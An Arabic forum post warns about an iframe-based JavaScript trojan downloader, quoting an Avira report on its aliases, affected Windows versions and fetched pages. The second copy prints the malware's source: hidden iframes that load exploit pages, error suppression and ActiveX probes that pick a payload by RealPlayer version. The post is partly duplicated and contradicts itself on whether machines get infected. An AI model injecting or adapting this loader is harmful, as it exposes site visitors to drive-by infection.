himoScript
زيزوومى مميز
- إنضم
- 3 مايو 2008
- المشاركات
- 673
- مستوى التفاعل
- 169
- النقاط
- 550
- الإقامة
- معشوقتى الاولى وامى (مصر)
- الموقع الالكتروني
- forum.zyzoom.org
غير متصل
السلام عليكم
بخش بالموضوع
---- تم الكش عن تروجن او ثغره او ملف ضار اليوم
---- المهم شباب ليس ملف عادى ولا يعمل بالنظام
----المهم شباب انه يصيب صفحات الهتمل وبذلك يصاب به جهازج
------
التقارير
----------
Alias:
• Mcafee: Exploit-IFrame trojan
• Kaspersky: Trojan-Downloader.JS.Timul.cw
• F-Secure: Trojan-Downloader.JS.Timul.cw
• Grisoft: Exploit
• Bitdefender: Trojan.Exploit.JS.O
Platforms / OS:
• Windows 95
• Windows 98
• Windows 98 SE
• Windows NT
• Windows ME
• Windows 2000
• Windows XP
• Windows 2003
Side effects:
• Downloads malicious files
Files
It tries to download some files:
– The is the following:
• %visited URL%/flash.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/14.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/office.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/nt.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/re10.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/re11.htm
At the time of writing this file was not online for further investigation.
السورس للكود الضار او الثغره
لايوجد حل لهذه المشكله حتى الأن
حيث ان الملف لايصيب الجهاز
لانتكلم من فراغ فهذا دليل على كلامى
المصدر
http://www.avira.com/en/threats/section/fulldetails/id_vir/4340/html_iframe.800.html
بخش بالموضوع
---- تم الكش عن تروجن او ثغره او ملف ضار اليوم
---- المهم شباب ليس ملف عادى ولا يعمل بالنظام
----المهم شباب انه يصيب صفحات الهتمل وبذلك يصاب به جهازج
------
التقارير
----------
Alias:
• Mcafee: Exploit-IFrame trojan
• Kaspersky: Trojan-Downloader.JS.Timul.cw
• F-Secure: Trojan-Downloader.JS.Timul.cw
• Grisoft: Exploit
• Bitdefender: Trojan.Exploit.JS.O
Platforms / OS:
• Windows 95
• Windows 98
• Windows 98 SE
• Windows NT
• Windows ME
• Windows 2000
• Windows XP
• Windows 2003
Side effects:
• Downloads malicious files
Files
It tries to download some files:
– The is the following:
• %visited URL%/flash.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/14.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/office.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/nt.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/re10.htm
At the time of writing this file was not online for further investigation.
– The is the following:
• %visited URL%/re11.htm
At the time of writing this file was not online for further investigation.
السورس للكود الضار او الثغره
PHP:
script>
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
document.write("<iframe width=20 height=0 src=sina.htm></iframe>");
status="حê³ة";
onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=office.htm></iframe>");
try{var f;
var qw=new ActiveX("GLIEDown.IEDown.1");}
catch(f){};
finally{if(f!="[ Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var hq=new ActiveX("Downloader.DLoader.1");}
catch(m){};
finally{if(m!="[ Error]"){document.write("<iframe width=100 height=0 src=sina.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveX(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=re10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=re11.htm></iframe>");
}
test();
لايوجد حل لهذه المشكله حتى الأن
حيث ان الملف لايصيب الجهاز
لانتكلم من فراغ فهذا دليل على كلامى
المصدر
http://www.avira.com/en/threats/section/fulldetails/id_vir/4340/html_iframe.800.html
